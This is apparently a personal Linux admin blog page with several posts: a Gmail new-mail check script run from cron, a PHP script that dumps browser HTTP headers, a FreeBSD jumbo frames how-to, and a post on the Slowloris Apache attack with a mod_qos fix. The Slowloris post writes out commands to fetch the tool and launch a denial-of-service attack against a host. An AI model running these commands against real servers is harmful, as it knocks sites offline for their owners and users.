Linux Users Group M. – [7] discussions, [10] comments and [2] jobs on LinkedIn
Twitter – Lynn Serafinn (@LynnSerafinn) has sent you a direct message on Twitter!
Facebook – Sys, you have notifications pending
Twitter – Email Marketing (@optinlists) is now following you on Twitter!
Twitter – Lynn Serafinn (@LynnSerafinn) is now following you on Twitter!
NutshellMail – 32 New Messages for Sat 3/31 12:00 PM
Linux Users Group M. – [10] discussions, [5] comments and [8] jobs on LinkedIn
eBay – Deals up to 60% OFF + A Sweepstakes!
LinkedIn Today – Top news today: The Magic of Doing One Thing at a Time
NutshellMail – 29 New Messages for Fri 3/30 12:00 PM
Linux Users Group M. – [16] discussions, [8] comments and [8] jobs on LinkedIn
Ervan Faizal Rizki . – Join my network on LinkedIn
Twitter – LEXO (@LEXOmx) retweeted one of your Tweets!
NutshellMail – 24 New Messages for Thu 3/29 12:00 PM
Facebook – Your Weekly Facebook Page Update
Linux Users Group M. – [11] discussions, [9] comments and [16] jobs on LinkedIn

As you see this one liner uses curl to fetch the information from mail.google.com's atom feed and then uses awk and sed to parse the returned content and make it suitable for display.

If you want to use the script every now and then on a Linux server or your Linux desktop, you can download the above code as a script file – quick_gmail_new_mail_check.sh – here.

Here is a screenshot of script's returned output:

Quick Gmail New Mail Check bash script screenshot

A good use of a modified version of the script is in conjunction with a 15-minute cron job to check for new Gmail mails and launch your favourite desktop mail client.
This method is useful if you don't want a constantly hanging Thunderbird or Evolution POP3 / IMAP client on your system just taking up memory or dangling in the window list.
I've done a little modification to the script to simply launch a predefined email reader program if the Gmail atom feed returns that new unread mails are available; check or download my check_gmail_unread_mail.sh here.
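As a rough idea of what such a modification looks like (this is a minimal sketch, not the exact script linked above – the mail client and credentials are placeholders):

#!/bin/sh
# sketch: count <entry> occurrences in the Gmail atom feed and start a mail client if any are found
gmail_username='YOUR-USERNAME';
gmail_password='YOUR-PASSWORD';
new_mails=$(curl --silent -u "$gmail_username@gmail.com:$gmail_password" \
"https://mail.google.com/mail/feed/atom" | grep -o '<entry>' | wc -l);
if [ "$new_mails" -gt 0 ]; then
    # launch the preferred mail client (adjust to your own)
    thunderbird &
fi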
Bear in mind that in case of errors due to an incorrect username or password, the script will not return any error. The script is missing proper error handling. Therefore, before you use the script make sure:

gmail_username='YOUR-USERNAME';
gmail_password='YOUR-PASSWORD';

are 100% correct.

To launch the script as a 15-minute cronjob, put it somewhere and place a cron entry for your (non-root) user:

# crontab -u your-user -e
...
*/15 * * * * /path/to/check_gmail_unread_mail.sh

Once you have read your new emails in, let's say, Thunderbird, close it, and on the next delivered unread Gmail mails your mail client will pop up by itself again. Once the mail client is closed, the script execution terminates.
Consider that if you get Gmail emails too frequently, using the script might be annoying, as every 15 minutes your mail client will be re-opened.

If you use any of the shell scripts, make sure they are well secured (owned and readable only by you). The Gmail username and password are in plain text, so someone could steal your password very easily. For a one-user Linux desktop system, as in my case, security is not such a big concern; making the script readable only by my user (e.g. chmod 0700) is enough.
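For example, using the path from the cron example above:

chown your-user: /path/to/check_gmail_unread_mail.sh
chmod 0700 /path/to/check_gmail_unread_mail.sh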

Tiny PHP script to dump your browser set HTTP headers (useful in debugging)

Friday, March 30th, 2012

While browsing I stumbled upon a nice blog article

Dumping HTTP headers

The article points at a few ways to DUMP the HTTP headers obtained from the user's browser.
As I'm not proficient with Ruby, Java and AOLserver, what caught my attention is a tiny PHP loop, which goes through all the HTTP_* browser-set variables and prints them out. Here is the PHP script code:

<?php
// send the header before any output (calling header() after echo would fail)
header('Content-type: text/html');
// preg_match() is used here, as ereg() is deprecated / removed in modern PHP
foreach ($_SERVER as $h => $v)
    if (preg_match('/HTTP_(.+)/', $h))
        echo "<li>$h = $v</li>\n";
?>

The script is pretty easy to use, just place it in a directory on a WebServer capable of executing php and save it under a name like:
show_HTTP_headers.php

If you don't want to bother copy-pasting the above code, you can also download the dump_HTTP_headers.php script here, rename dump_HTTP_headers.php.txt to dump_HTTP_headers.php and you're ready to go.

Browse to the respective URL to execute the script. I've installed the script on my webserver, so if you are curious about the output the script returns, check your own browser's HTTP values by clicking here.
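You can also poke the script from the command line and watch how extra request headers show up as HTTP_* entries (the URL, agent string and header below are just examples):

curl -s -A "MyTestAgent/1.0" -H "X-Debug: 1" http://your-webserver/show_HTTP_headers.php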
PHP will produce output like the one in the screenshot you see below, the shot is taken from my Opera browser:

Screenshot show HTTP headers.php script Opera Debian Linux

Another sample of the text output the script produce whilst invoked in my Epiphany GNOME browser is:

HTTP_HOST = www.pc-freak.net
HTTP_USER_AGENT = Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ Debian/squeeze (2.30.6-1) Epiphany/2.30.6
HTTP_ACCEPT = application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
HTTP_ACCEPT_ENCODING = gzip
HTTP_ACCEPT_LANGUAGE = en-us, en;q=0.90
HTTP_COOKIE = __qca=P0-2141911651-1294433424320;
__utma_a2a=8614995036.1305562814.1274005888.1319809825.1320152237.2021;wooMeta=MzMxJjMyOCY1NTcmODU1MDMmMTMwODQyNDA1MDUyNCYxMzI4MjcwNjk0ODc0JiYxMDAmJjImJiYm; 3ec0a0ded7adebfeauth=22770a75911b9fb92360ec8b9cf586c9;
__unam=56cea60-12ed86f16c4-3ee02a99-3019;
__utma=238407297.1677217909.1260789806.1333014220.1333023753.1606;
__utmb=238407297.1.10.1333023754; __utmc=238407297;
__utmz=238407297.1332444980.1586.413.utmcsr=pc-freak.net|utmccn=(referral)|utmcmd=referral|utmcct=/blog/

You see, the script returns plenty of useful information for debugging purposes:
HTTP_HOST – the Virtual Host Webserver name
HTTP_USER_AGENT – the exact browser type, as returned in its user-agent string
HTTP_ACCEPT – the MIME types the browser accepts
HTTP_ACCEPT_LANGUAGE – the languages the browser has support for
HTTP_ACCEPT_ENCODING – this variable is usually set to gzip or deflate by the browser if it supports compressed content; if it is there, the webserver may return its HTML and static files in gzipped form.
HTTP_COOKIE – information about browser cookies; this info can be used for XSS attacks etc. 🙂
HTTP_COOKIE also contains the referrer, which in the above case is:
__utmz=238407297.1332444980.1586.413.utmcsr=pc-freak.net|utmccn=(referral)
The Cookie information HTTP var also contains information on the exact link referrer:
|utmcmd=referral|utmcct=/blog/

For the sake of comparison, the show_HTTP_headers.php script output from the elinks text browser looks like so:

* HTTP_HOST = www.pc-freak.net
* HTTP_USER_AGENT = Links (2.3pre1; Linux 2.6.32-5-amd64 x86_64; 143x42)
* HTTP_ACCEPT = */*
* HTTP_ACCEPT_ENCODING = gzip,deflate
* HTTP_ACCEPT_CHARSET = us-ascii, ISO-8859-1, ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-9, ISO-8859-10, ISO-8859-13, ISO-8859-14, ISO-8859-15, ISO-8859-16, windows-1250, windows-1251, windows-1252, windows-1256, windows-1257, cp437, cp737, cp850, cp852, cp866, x-cp866-u, x-mac, x-mac-ce, x-kam-cs, koi8-r, koi8-u, koi8-ru, TCVN-5712, VISCII, utf-8
* HTTP_ACCEPT_LANGUAGE = en,*;q=0.1
* HTTP_CONNECTION = keep-alive
One good reason why it is worth giving this script a run is that it can help you reveal problems with HTTP headers: improperly set cookies, language encoding problems, security holes etc. Also, the script is a good example for starters learning PHP programming.

 

FreeBSD Jumbo Frames network configuration short how to

Wednesday, March 14th, 2012

FreeBSD Jumbo Frames Howto configure FreeBSD

Recently I wrote a post on how to enable Jumbo Frames on GNU / Linux, so I thought it would be useful to write up how the Jumbo Frames network boost can be achieved on FreeBSD too.

I will skip the details of what Jumbo Frames are, as I explained them thoroughly in the previous article. Just in short, to remind you what Jumbo Frames are and why you might need them – they are a way to increase the network transfer frame size from the standard MTU of 1500 to an MTU of 9000 bytes.

It is interesting to mention that, according to specifications, the maximum Jumbo Frames MTU possible for assignment is MTU=16128.
Just like on Linux, to be able to take advantage of the bigger Jumbo Frames increase in network throughput, you need to have gigabit NIC card(s) on the router / server.

1. Increasing MTU to 9000 to enable Jumbo Frames "manually"

Just like on Linux, the network tool to use is ifconfig. For those who don't know, ifconfig on Linux is part of the net-tools package, rewritten from scratch especially for the GNU / Linux OS, whereas BSD's ifconfig is based on source code taken from 4.2BSD UNIX.

As you know, network interface naming on FreeBSD is different; there is no generic naming like on Linux (eth0, eth1, eth2), rather the interfaces are named after the NIC card driver / vendor, for instance an Intel(R) PRO/1000 NIC is em0, a RealTek is rl0 etc.

To set a Jumbo Frames Maximum Transmission Unit of 9000 on a FreeBSD host with Realtek and Intel gigabit ethernet cards, use:

freebsd# /sbin/ifconfig em0 192.168.1.2 mtu 9000
freebsd# /sbin/ifconfig rl0 192.168.2.2 mtu 9000

!! Be very cautious here: if you're connected to the system remotely over ssh, you might lose connection to it because of broken routing.

To prevent routing loss problems, if you're executing the above two commands remotely, you had better run them in a GNU screen session:

freebsd# screen
freebsd# /sbin/ifconfig em0 192.168.1.2 mtu 9000; /sbin/ifconfig rl0 192.168.2.2 mtu 9000; \
/etc/rc.d/netif restart; /etc/rc.d/routed restart

2. Check MTU settings are set to 9000

If everything is fine the commands will return empty output, to check further the MTU is properly set to 9000 issue:

freebsd# /sbin/ifconfig -a | grep -i em0
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 9000
freebsd# /sbin/ifconfig -a | grep -i rl0
rl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 9000

3. Reset routing for default gateway

If you have some kind of routing assigned for the em0 and rl0 network interfaces, it will be affected by the MTU change and the routing will be gone. To reset the routing to the previously assigned one, you have to restart the BSD init script that takes care of assigning routing at system boot time:

freebsd# /etc/rc.d/routing restart
default 192.168.1.1 done
add net default: gateway 192.168.1.1
Additional routing options: IP gateway=YES.

4. Change MTU settings for NIC card with route command

There is also a way to assign a higher MTU without "breaking" the working routing, e.g. avoiding network downtime, with the BSD route command:

freebsd# grep -i defaultrouter /etc/rc.conf
defaultrouter="192.168.1.1"
freebsd# /sbin/route change 192.168.1.1 -mtu 9000
change host 192.168.1.1

5. Finding the new MTU NIC settings on the FreeBSD host

freebsd# /sbin/route -n get 192.168.1.1
route to: 192.168.1.1
destination: 192.168.1.1
interface: em0
flags: <UP,HOST,DONE,LLINFO,WASCLONED>
recvpipe sendpipe ssthresh rtt,msec rttvar hopcount mtu expire
0 0 0 0 0 0 9000 1009

6. Set Jumbo Frames to load automatically on system load

To make the MTU increase to 9000 for Jumbo Frames support permanent on a FreeBSD system, the /etc/rc.conf file is used:

The variables for the em0 and rl0 NICs are ifconfig_em0 and ifconfig_rl0.
The lines to place in /etc/rc.conf should be similar to:

ifconfig_em0="inet 192.168.1.1 netmask 255.255.255.0 media 1000baseTX mediaopt half-duplex mtu 9000"
ifconfig_em0="inet 192.168.1.1 netmask 255.255.255.0 media 1000baseTX mediaopt half-duplex mtu 9000"

Change the IP addresses and the netmask 255.255.255.0 in the above lines to your corresponding addresses and netmask.
Also, in the above example you see the half-duplex ifconfig option is set instead of full-duplex, in order to prevent duplex mismatches. Full-duplex could be used instead if you're completely sure the other side of the link is configured to support full-duplex connections. Otherwise, if you try to set full-duplex with the other side set to half-duplex or auto, a duplex mismatch will occur. If this happens, instead of taking advantage of the increased Jumbo Frames MTU, the network connection could become slower than it originally was with the standard ethernet MTU of 1500. Another bad side effect of ending up with a duplex mismatch could be a high number of lost packets and degraded throughput …
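To check which media / duplex mode an interface has actually negotiated on the FreeBSD side, you can inspect its ifconfig output, e.g.:

freebsd# ifconfig em0 | grep media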

7. Setting Jumbo Frames for interfaces assigned a dynamic IP via DHCP

If you need to assign an MTU of 9000 to gigabit network interfaces which receive their TCP/IP network configuration from a DHCP server:
First, tell the em0 and rl0 network interfaces to dynamically obtain IP addresses via the DHCP protocol by adding to /etc/rc.conf:

ifconfig_em0="DHCP"
ifconfig_rl0="DHCP"

Secondly, make two files, /etc/start_if.em0 and /etc/start_if.rl0, and include in each respectively:

ifconfig em0 media 1000baseTX mediaopt full-duplex mtu 9000
ifconfig rl0 media 1000baseTX mediaopt full-duplex mtu 9000

Copy / paste in root console:

echo 'ifconfig em0 media 1000baseTX mediaopt full-duplex mtu 9000' >> /etc/start_if.em0
echo 'ifconfig rl0 media 1000baseTX mediaopt full-duplex mtu 9000' >> /etc/start_if.rl0

Finally, to load the new MTU for both interfaces, reload the IPs with the increased MTUs:

freebsd# /etc/rc.d/routing restart
default 192.168.1.1 done
add net default: gateway 192.168.1.1

8. Testing if Jumbo Frames is working correctly

To test if packets with the bigger MTU are transferred correctly through the network, you can use ping or tcpdump.

a.) Testing Jumbo Frames enabled packet transfers with tcpdump

freebsd# tcpdump -vvn | grep -i 'length 9000'

You should get output like:

16:40:07.432370 IP (tos 0x0, ttl 50, id 63903, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 85825:87285(1460) ack 668 win 14343
16:40:07.432588 IP (tos 0x0, ttl 50, id 63904, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 87285:88745(1460) ack 668 win 14343
16:40:07.433091 IP (tos 0x0, ttl 50, id 63905, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 23153:24613(1460) ack 668 win 14343
16:40:07.568388 IP (tos 0x0, ttl 50, id 63907, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 88745:90205(1460) ack 668 win 14343
16:40:07.568636 IP (tos 0x0, ttl 50, id 63908, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 90205:91665(1460) ack 668 win 14343
16:40:07.569012 IP (tos 0x0, ttl 50, id 63909, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 91665:93125(1460) ack 668 win 14343
16:40:07.569888 IP (tos 0x0, ttl 50, id 63910, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 93125:94585(1460) ack 668 win 14343

b.) Testing if Jumbo Frames are enabled with ping

Testing Jumbo Frames with ping command on Linux

linux:~# ping 192.168.1.1 -M do -s 8972
PING 192.168.1.1 (192.168.1.1) 8972(9000) bytes of data.
9000 bytes from 192.168.1.1: icmp_req=1 ttl=52 time=43.7 ms
9000 bytes from 192.168.1.1: icmp_req=2 ttl=52 time=43.3 ms
9000 bytes from 192.168.1.1: icmp_req=3 ttl=52 time=43.5 ms
9000 bytes from 192.168.1.1: icmp_req=4 ttl=52 time=44.6 ms
--- 192.168.1.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 2.397/2.841/4.066/0.708 ms

If you instead get an output like:

From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)
From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)
From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)
From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)

--- 192.168.1.1 ping statistics ---
0 packets transmitted, 0 received, +4 errors

This means only packets with a maximum MTU of 1500 could be transmitted, and hence something is not okay with the Jumbo Frames config.
Another helpful command for debugging MTU and showing which host in the hop chain supports jumbo frames is Linux's traceroute.

To debug a path between host and target, you can use:

linux:~# traceroute --mtu www.google.com
...

If you want to test the Jumbo Frames configuration from a Windows host use ms-windows ping command like so:

C:\>ping 192.168.1.2 -f -l 8972
Pinging 192.168.1.2 with 8972 bytes of data:
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Ping statistics for 192.168.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 2ms, Average = 2ms

Here the -l 8972 value effectively corresponds to 9000-byte frames: 8972 = 9000 – 20 (20-byte IP header) – 8 (8-byte ICMP header).

Apache Denial of Service (DoS) attack with Slowloris / Crashing Apache

Monday, February 1st, 2010

slowloris-denial-of-service-apache-logo
A friend of mine pointed me to a nice tool that is able to create a successful denial of service against most of the web servers running out there. The tool is called Slowloris.
For any further information, there is the following publication about Slowloris on ha.ckers.org.
The original article by my friend is located on his personal blog (mpetrov.net).
Unfortunately the post is in Bulgarian, so it's not suitable for an English-speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
Now issue the attack:
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go – the Apache server is not responding, no traces of the DoS are left on the server, and the log file is completely clear of records!
The fix for the attack comes with installing the not-so-popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.c

The module installs to /usr/lib/apache2/modules. All that is left is configuring the module:
# cd /etc/apache2/mods-available/
# vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
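Loading the module alone does not impose any limits; to actually mitigate slow-request attacks, mod_qos needs a few directives configured. A minimal sketch (the values are purely illustrative – tune them to your traffic and consult the mod_qos documentation), which would typically go into a qos.conf next to qos.load:

<IfModule mod_qos.c>
# limit the number of concurrent TCP connections allowed per source IP
QS_SrvMaxConnPerIP 50
# drop clients that send/receive request data slower than 120 bytes/sec (upper limit 1200)
QS_SrvMinDataRate 120 1200
</IfModule>

Then enable the module with a2enmod qos and reload Apache (/etc/init.d/apache2 reload).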

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.